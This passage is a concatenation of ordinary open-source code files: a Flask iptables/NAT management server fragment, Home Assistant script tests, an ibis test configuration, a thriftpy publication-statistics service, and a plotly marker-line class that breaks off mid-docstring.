execute_sql('UPDATE internet SET status=?', (not flag,))
return "success"
except Exception as e:
return str(e)
###################
# HELPER FUNCTION #
###################
def add_dnat(ori, new):
return subprocess.call(dnat_cmd % ("-A", ori, new), shell = True) == 0
def del_dnat(ori, new):
return subprocess.call(dnat_cmd % ("-D", ori, new), shell = True) == 0
def add_arp(ip, dev = "eth0"):
"""
Add a fake static ARP entry for the given ip address to ensure DNAT success.
Note : DNAT will need mac addr for destination ip addr
"""
cmd = ("arp -i %s -s %s 11:50:22:44:55:55") % (dev, ip)
return subprocess.call(cmd, shell = True) == 0
def del_arp(ip):
return subprocess.call(["arp -d ", ip], shell = True) == 0
def add_port_fwd(proto, dport, dst):
cmd = port_fwd_cmd % ("-A", proto,"10.0.1.122", dport, dst)
return subprocess.check_output(cmd, shell = True)
def del_port_fwd(proto, dport, dst):
cmd = port_fwd_cmd % ("-D", proto,"10.0.1.122", dport, dst)
return subprocess.check_output(cmd, shell = True)
def internet_on():
return os.path.isfile(internet_tag_file)
def enable_internet():
print "INTERNET ENABLED"
# create a file to indicate the state of internet connection
if not os.path.isfile(internet_tag_file):
open(internet_tag_file, "a").close()
total_subnet = ",".join([net_config["HqCidr"],net_config["VpcCidr"]])
cmd = internet_cmd % ('-A', total_subnet)
return subprocess.call(cmd, shell = True) == 0
def disable_internet():
print "INTERNET DISABLED"
if os.path.isfile(internet_tag_file):
os.remove(internet_tag_file)
total_subnet = ",".join([net_config["HqCidr"],net_config["VpcCidr"]])
cmd = internet_cmd % ('-D', total_subnet)
return subprocess.call(cmd, shell = True) == 0
if __name__ == "__main__":
init_db()
app.run(host='0.0.0.0',port=int(net_config['VcgServicePort']))
| apache-2.0 | 7,519,551,738,405,763,000 | 30.283186 | 112 | 0.591372 | false |
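All of the iptables manipulation in server.py above flows through the %-templates defined at the top of the file. A small sketch of how they expand follows; the addresses and port are illustrative only.

```python
# Hedged sketch: how the command templates above become iptables invocations.
dnat_cmd = "sudo iptables -t nat %s PREROUTING -d %s -j DNAT --to-destination %s"
port_fwd_cmd = ("sudo iptables -t nat %s PREROUTING -p %s -d %s "
                "--dport %s -j DNAT --to-destination %s")

# One-to-one DNAT: traffic addressed to 10.0.1.50 is rewritten to 192.168.10.5.
print(dnat_cmd % ("-A", "10.0.1.50", "192.168.10.5"))

# Port forwarding: TCP port 8080 on 10.0.1.122 is sent to 192.168.10.5:80.
print(port_fwd_cmd % ("-A", "tcp", "10.0.1.122", "8080", "192.168.10.5:80"))
```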
| fbradyirl/home-assistant | tests/components/script/test_init.py | 1 | 9084 |
"""The tests for the Script component."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch, Mock
import pytest
from homeassistant.components import script
from homeassistant.components.script import DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
SERVICE_RELOAD,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
EVENT_SCRIPT_STARTED,
)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.loader import bind_hass
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.exceptions import ServiceNotFound
from tests.common import get_test_home_assistant
ENTITY_ID = "script.test"
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
_, object_id = split_entity_id(entity_id)
hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
"""Toggle the script.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def reload(hass):
"""Reload script component.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_with_invalid_configs(self):
"""Test setup with invalid configs."""
for value in (
{"test": {}},
{"test hello world": {"sequence": [{"event": "bla"}]}},
{
"test": {
"sequence": {
"event": "test_event",
"service": "homeassistant.turn_on",
}
}
},
):
assert not setup_component(
self.hass, "script", {"script": value}
), "Script loaded with wrong config {}".format(value)
assert 0 == len(self.hass.states.entity_ids("script"))
def test_turn_on_service(self):
"""Verify that the turn_on service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
# Calling turn_on a second time should not advance the script
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert 0 == len(events)
turn_off(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
state = self.hass.states.get("group.all_scripts")
assert state is not None
assert state.attributes.get("entity_id") == (ENTITY_ID,)
def test_toggle_service(self):
"""Test the toggling of a service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
def test_passing_variables(self):
"""Test different ways of passing in variables."""
calls = []
context = Context()
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register("test", "script", record_call)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {
"sequence": {
"service": "test.script",
"data_template": {"hello": "{{ greeting }}"},
}
}
}
},
)
turn_on(self.hass, ENTITY_ID, {"greeting": "world"}, context=context)
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data["hello"] == "world"
self.hass.services.call(
"script", "test", {"greeting": "universe"}, context=context
)
self.hass.block_till_done()
assert len(calls) == 2
assert calls[1].context is context
assert calls[1].data["hello"] == "universe"
def test_reload_service(self):
"""Verify that the turn_on service."""
assert setup_component(
self.hass,
"script",
{"script": {"test": {"sequence": [{"delay": {"seconds": 5}}]}}},
)
assert self.hass.states.get(ENTITY_ID) is not None
assert self.hass.services.has_service(script.DOMAIN, "test")
with patch(
"homeassistant.config.load_yaml_config_file",
return_value={
"script": {"test2": {"sequence": [{"delay": {"seconds": 5}}]}}
},
):
with patch("homeassistant.config.find_config_file", return_value=""):
reload(self.hass)
self.hass.block_till_done()
assert self.hass.states.get(ENTITY_ID) is None
assert not self.hass.services.has_service(script.DOMAIN, "test")
assert self.hass.states.get("script.test2") is not None
assert self.hass.services.has_service(script.DOMAIN, "test2")
async def test_shared_context(hass):
"""Test that the shared context is passed down the chain."""
event = "test_event"
context = Context()
event_mock = Mock()
run_mock = Mock()
hass.bus.async_listen(event, event_mock)
hass.bus.async_listen(EVENT_SCRIPT_STARTED, run_mock)
assert await async_setup_component(
hass, "script", {"script": {"test": {"sequence": [{"event": event}]}}}
)
await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, context=context
)
await hass.async_block_till_done()
assert event_mock.call_count == 1
assert run_mock.call_count == 1
args, kwargs = run_mock.call_args
assert args[0].context == context
# Ensure event data has all attributes set
assert args[0].data.get(ATTR_NAME) == "test"
assert args[0].data.get(ATTR_ENTITY_ID) == "script.test"
# Ensure context carries through the event
args, kwargs = event_mock.call_args
assert args[0].context == context
# Ensure the script state shares the same context
state = hass.states.get("script.test")
assert state is not None
assert state.context == context
async def test_logging_script_error(hass, caplog):
"""Test logging script error."""
assert await async_setup_component(
hass,
"script",
{"script": {"hello": {"sequence": [{"service": "non.existing"}]}}},
)
with pytest.raises(ServiceNotFound) as err:
await hass.services.async_call("script", "hello", blocking=True)
assert err.value.domain == "non"
assert err.value.service == "existing"
assert "Error executing script" in caplog.text
async def test_turning_no_scripts_off(hass):
"""Test it is possible to turn two scripts off."""
assert await async_setup_component(hass, "script", {})
# Testing it doesn't raise
await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {"entity_id": []}, blocking=True
)
| apache-2.0 | -9,201,643,174,911,545,000 | 28.493506 | 87 | 0.572105 | false |
| cloudera/ibis | ibis/backends/pandas/tests/conftest.py | 1 | 1158 |
from pathlib import Path
import pandas as pd
import ibis
import ibis.expr.operations as ops
from ibis.backends.tests.base import BackendTest, RoundHalfToEven
class TestConf(BackendTest, RoundHalfToEven):
check_names = False
additional_skipped_operations = frozenset({ops.StringSQLLike})
supported_to_timestamp_units = BackendTest.supported_to_timestamp_units | {
'ns'
}
supports_divide_by_zero = True
returned_timestamp_unit = 'ns'
@staticmethod
def connect(data_directory: Path) -> ibis.client.Client:
return ibis.pandas.connect(
{
'functional_alltypes': pd.read_csv(
str(data_directory / 'functional_alltypes.csv'),
index_col=None,
dtype={'bool_col': bool, 'string_col': str},
parse_dates=['timestamp_col'],
encoding='utf-8',
),
'batting': pd.read_csv(str(data_directory / 'batting.csv')),
'awards_players': pd.read_csv(
str(data_directory / 'awards_players.csv')
),
}
)
| apache-2.0 | 8,643,831,911,716,360,000 | 32.085714 | 79 | 0.570812 | false |
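TestConf.connect above wires a set of CSV files into ibis's in-memory pandas backend. A reduced sketch of the same connection pattern follows; the data_directory path is a placeholder and only one table is loaded.

```python
# Hedged sketch of the ibis pandas-backend connection used by TestConf above.
from pathlib import Path

import pandas as pd
import ibis

data_directory = Path('ci/ibis-testing-data')  # placeholder location
client = ibis.pandas.connect(
    {'batting': pd.read_csv(str(data_directory / 'batting.csv'))}
)
batting = client.table('batting')
print(batting.columns)
```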
| fabiobatalha/publication_stats | publication/thrift/server.py | 1 | 7000 |
# coding: utf-8
import json
import argparse
import logging
import os
import sys
from publication.controller import stats, ServerError
import thriftpy
import thriftpywrap
from thriftpy.rpc import make_server
logger = logging.getLogger(__name__)
publication_stats_thrift = thriftpy.load(
os.path.join(os.path.dirname(__file__), 'publication_stats.thrift'))
class Dispatcher(object):
def __init__(self):
self._stats = stats()
def _stats_dispatcher(self, *args, **kwargs):
try:
data = self._stats.publication_stats(*args, **kwargs)
except ValueError as e:
logging.error(e.message)
raise publication_stats_thrift.ValueError(message=e.message)
except ServerError as e:
raise publication_stats_thrift.ServerError(message=e.message)
return data
def search(self, doc_type, body, parameters):
params = {i.key:i.value for i in parameters}
params['doc_type'] = doc_type
params['body'] = json.loads(body)
try:
data = self._stats.publication_search(params)
except ValueError as e:
logging.error(e.message)
raise publication_stats_thrift.ValueError(message=e.message)
except ServerError as e:
raise publication_stats_thrift.ServerError(message=e.message)
try:
data_str = json.dumps(data)
except ValueError as e:
logging.error('Invalid JSON data: %s' % data)
raise publication_stats_thrift.ValueError(message=e.message)
return data_str
def journal(self, aggs=None, filters=None):
try:
data = self._stats_dispatcher('journal', aggs=aggs, filters=filters)
except ValueError as err:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server: %s' % err.message
)
result = json.dumps(data)
return result
def journal_subject_areas(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['subject_areas'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['subject_areas']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_collections(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['collection'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['collection']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_statuses(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['status'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['status']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def journal_inclusion_years(self, filters=None):
data = self._stats_dispatcher('journal', aggs=['included_at_year'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['included_at_year']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_subject_areas(self, filters=None):
data = self._stats_dispatcher('article', aggs=['subject_areas'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['subject_areas']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document(self, aggs=None, filters=None):
try:
data = self._stats_dispatcher('article', aggs=aggs, filters=filters)
except ValueError as err:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server: %s' % err.message
)
result = json.dumps(data)
return result
def document_collections(self, filters=None):
data = self._stats_dispatcher('article', aggs=['collection'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['collection']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_publication_years(self, filters=None):
data = self._stats_dispatcher('article', aggs=['publication_year'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['publication_year']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_languages(self, filters=None):
data = self._stats_dispatcher('article', aggs=['languages'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['languages']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_affiliation_countries(self, filters=None):
data = self._stats_dispatcher('article', aggs=['aff_countries'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['aff_countries']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
def document_types(self, filters=None):
data = self._stats_dispatcher('article', aggs=['document_type'], filters=filters)
try:
result = [publication_stats_thrift.aggs(key=item['key'], count=item['doc_count']) for item in data['document_type']['buckets']]
except:
raise publication_stats_thrift.ServerError(
'Fail to retrieve data from server'
)
return result
main = thriftpywrap.ConsoleApp(publication_stats_thrift.PublicationStats, Dispatcher)
| bsd-2-clause | -4,031,151,090,188,490,000 | 30.96347 | 142 | 0.611143 | false |
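server.py above serves the Dispatcher through thriftpy's make_server. A hedged client-side counterpart using thriftpy's make_client follows; the host, port, .thrift path and the remote argument handling are all assumptions, since the .thrift definition itself is not part of this row.

```python
# Hedged client sketch for the PublicationStats service defined above.
import os

import thriftpy
from thriftpy.rpc import make_client

# Assumes the same .thrift file loaded by the server module.
publication_stats_thrift = thriftpy.load(
    os.path.join('publication', 'thrift', 'publication_stats.thrift'))

# Placeholder host/port: use whatever the server was started with.
client = make_client(publication_stats_thrift.PublicationStats,
                     'localhost', 11620)

# The filters argument is assumed to be nullable in the .thrift definition.
for agg in client.journal_subject_areas(None):
    print(agg.key, agg.count)
```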
| plotly/python-api | packages/python/plotly/plotly/graph_objs/splom/marker/_line.py | 1 | 24938 |
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "splom.marker"
_path_str = "splom.marker.line"
_valid_props = {
"autocolorscale",
"cauto",
"cmax",
"cmid",
"cmin",
"color",
"coloraxis",
"colorscale",
"colorsrc",
"reversescale",
"width",
"widthsrc",
}
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is true, the
default palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `marker.line.color`) or the
bounds set in `marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a numerical
array. Defaults to `false` when `marker.line.cmin` and
`marker.line.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be equidistant
to this point. Has an effect only if in `marker.line.color`is
set to a numerical array. Value should have the same units as
in `marker.line.color`. Has no effect when `marker.line.cauto`
is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
in `marker.line.color`is set to a numerical array. Value should
have the same units as in `marker.line.color` and if set,
`marker.line.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# color
# -----
@property
def color(self):
"""
Sets the marker.line color. It accepts either a specific color or
an array of numbers that are mapped to the colorscale relative
to the max and min values of the array or relative to
`marker.line.cmin` and `marker.line.cmax` if set.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A number that will be interpreted as a color
according to splom.marker.line.colorscale
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The colorscale
must be an array containing arrays mapping a normalized value
to an rgb, rgba, hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and highest (1) values
are required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the colorscale in
color space, use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name string of the
following list: Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,Earth,Electric,Vi
ridis,Cividis.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd'].
Appending '_r' to a named colorscale reverses it.
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
        Sets the source reference on Chart Studio Cloud for `color`.
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
        Reverses the color mapping if true. Has an effect only if
        `marker.line.color` is set to a numerical array. If true,
`marker.line.cmin` will correspond to the last color in the
array and `marker.line.cmax` will correspond to the first
color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# width
# -----
@property
def width(self):
"""
Sets the width (in px) of the lines bounding the marker points.
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# widthsrc
# --------
@property
def widthsrc(self):
"""
        Sets the source reference on Chart Studio Cloud for `width`.
The 'widthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["widthsrc"]
@widthsrc.setter
def widthsrc(self, val):
self["widthsrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
            `marker.line.colorscale`. Has an effect only if
            `marker.line.color` is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
            `marker.line.cmin` and `marker.line.cmax`. Has an
            effect only if `marker.line.color` is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
            only if `marker.line.color` is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
            equidistant to this point. Has an effect only if
            `marker.line.color` is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
            only if `marker.line.color` is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
            Sets the marker.line color. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
            Sets the colorscale. Has an effect only if
            `marker.line.color` is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
            use `marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Greys,YlGnBu,Greens,YlOrR
d,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,H
ot,Blackbody,Earth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud for
            `color`.
reversescale
Reverses the color mapping if true. Has an effect only
            if `marker.line.color` is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
widthsrc
Sets the source reference on Chart Studio Cloud for
            `width`.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
color=None,
coloraxis=None,
colorscale=None,
colorsrc=None,
reversescale=None,
width=None,
widthsrc=None,
**kwargs
):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.splom.marker.Line`
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
            `marker.line.colorscale`. Has an effect only if
            `marker.line.color` is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
            `marker.line.cmin` and `marker.line.cmax`. Has an
            effect only if `marker.line.color` is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
            equidistant to this point. Has an effect only if
            `marker.line.color` is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
            only if `marker.line.color` is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
            Sets the marker.line color. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
            Sets the colorscale. Has an effect only if
            `marker.line.color` is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
            use `marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Greys,YlGnBu,Greens,YlOrR
d,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,H
ot,Blackbody,Earth,Electric,Viridis,Cividis.
colorsrc
